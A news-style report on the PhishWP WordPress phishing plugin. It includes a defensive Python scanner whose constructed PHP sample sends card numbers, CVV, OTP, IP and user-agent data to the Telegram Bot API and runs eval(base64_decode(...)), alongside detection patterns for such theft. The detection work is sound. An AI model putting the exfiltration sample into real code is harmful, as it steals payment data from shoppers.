The newly discovered PhishWP WordPress plugin could enable cybercriminals to build bogus payment sites that impersonate legitimate services and steal financial and personal data.
Reports revealed that the malicious plugin was first discovered on a Russian cybercriminal website. The researchers stated that it lets attackers create convincing payment interfaces that harvest information such as credit card details, billing addresses, and even one-time passwords.
Once the information is entered, PhishWP immediately exfiltrates the stolen data to an attacker-controlled Telegram account.
Additional investigation also revealed that threat actors use PhishWP to compromise existing WordPress sites or create bogus ones. The plugin's design closely resembles legitimate payment gateways, making the ruse difficult for consumers to identify.
The PhishWP plugin is a formidable tool that cybercriminals can add to their arsenals.
PhishWP offers capabilities that could appeal to a range of hackers and cybercriminal groups. It can generate customisable checkout pages that look like authentic payment processors, harvest OTPs to bypass security prompts, and exfiltrate stolen data to an attacker-controlled Telegram account.
When 3DS code requests are enabled, the plugin displays a 3DS code popup so that the code entered is likewise transferred to the threat actor. Researchers noted that the victim's IP address and browser information are transferred along with the credit card data.
To ensure the attackers have enough time to exploit the stolen information, the plugin includes functionality that sends victims a confirmation email containing their order details.
Furthermore, the malware collects browser information, sends fraudulent confirmation emails, supports several languages for global campaigns, and even includes obfuscation tools to hide its malicious purpose.
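As an added defensive example (not code from the report or from PhishWP itself), the following Python scan looks for the combination of behaviours described above across the PHP files of a WordPress plugins directory: card and OTP field handling, victim fingerprinting, fraudulent confirmation mail, obfuscation, and exfiltration to Telegram. The indicator strings and the sample sources are assumptions constructed for illustration, and the Telegram Bot API endpoint is assumed as the exfiltration channel since the report names only the Telegram account.

```python
import re
from pathlib import Path
from typing import Dict, List

# Behaviours the report attributes to PhishWP, mapped to source-level indicators.
# The patterns are assumptions (the plugin's real code is not on the page).
INDICATORS: Dict[str, re.Pattern] = {
    "telegram_exfil": re.compile(r"api\.telegram\.org/bot[^/\s]+/sendMessage", re.I),
    "card_fields": re.compile(r"\b(card_?number|cvv|cvc|expiry|exp_?date)\b", re.I),
    "otp_or_3ds": re.compile(r"\b(otp|one[_ -]?time|3ds|three_?d_?secure)\b", re.I),
    "victim_fingerprint": re.compile(r"REMOTE_ADDR|HTTP_USER_AGENT", re.I),
    "fake_confirmation_mail": re.compile(r"\bwp_mail\s*\(|\bmail\s*\(", re.I),
    "obfuscation": re.compile(r"\beval\s*\(|base64_decode\s*\(|gzinflate\s*\(|str_rot13\s*\(", re.I),
}

def scan_source(text: str) -> List[str]:
    """Return the names of the indicators present in one PHP source string."""
    return [name for name, rx in INDICATORS.items() if rx.search(text)]

def risk_score(hits: List[str]) -> int:
    """Telegram exfil alone is suspicious; combined with card/OTP handling it is the PhishWP pattern."""
    score = 3 if "telegram_exfil" in hits else 0
    if "card_fields" in hits or "otp_or_3ds" in hits:
        score += 2
    score += sum(1 for h in ("victim_fingerprint", "fake_confirmation_mail", "obfuscation") if h in hits)
    return score

def scan_plugin_dir(root: Path) -> Dict[str, List[str]]:
    """Walk a wp-content/plugins tree and report only the PHP files with at least one hit."""
    report: Dict[str, List[str]] = {}
    for php in root.rglob("*.php"):
        hits = scan_source(php.read_text(errors="ignore"))
        if hits:
            report[str(php)] = hits
    return report

# Constructed sample mimicking the described behaviours; placeholders, not real bot credentials.
SAMPLE_MALICIOUS = '''<?php
$data = ['card' => $_POST['card_number'], 'cvv' => $_POST['cvv'], 'otp' => $_POST['otp'],
         'ip' => $_SERVER['REMOTE_ADDR'], 'ua' => $_SERVER['HTTP_USER_AGENT']];
file_get_contents("https://api.telegram.org/bot<TOKEN>/sendMessage?chat_id=<ID>&text=" . urlencode(json_encode($data)));
wp_mail($_POST['email'], "Order confirmation", "Thank you for your order");
eval(base64_decode($payload));
'''
# Constructed benign sample: a legitimate plugin sending mail should score low.
SAMPLE_BENIGN = '<?php add_action("init", function () { wp_mail("admin@example.com", "hi", "ok"); });'

if __name__ == "__main__":
    for label, src in (("malicious", SAMPLE_MALICIOUS), ("benign", SAMPLE_BENIGN)):
        hits = scan_source(src)
        print(label, risk_score(hits), hits)
```

A score that stacks Telegram exfiltration on top of card or OTP handling warrants pulling the file for manual review; a lone `wp_mail` hit is normal plugin behaviour.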
An example of a PhishWP attack is an attacker creating a fake e-commerce site stocked with lures such as discounted merchandise.
When victims enter their card information and OTPs on the fraudulent payment page, the data is immediately transferred to the attacker's Telegram account. The attackers then exploit the stolen data to conduct unlawful activities or sell it on dark web marketplaces.
The public should adopt robust browser-based phishing protection technologies to counter this new PhishWP campaign.
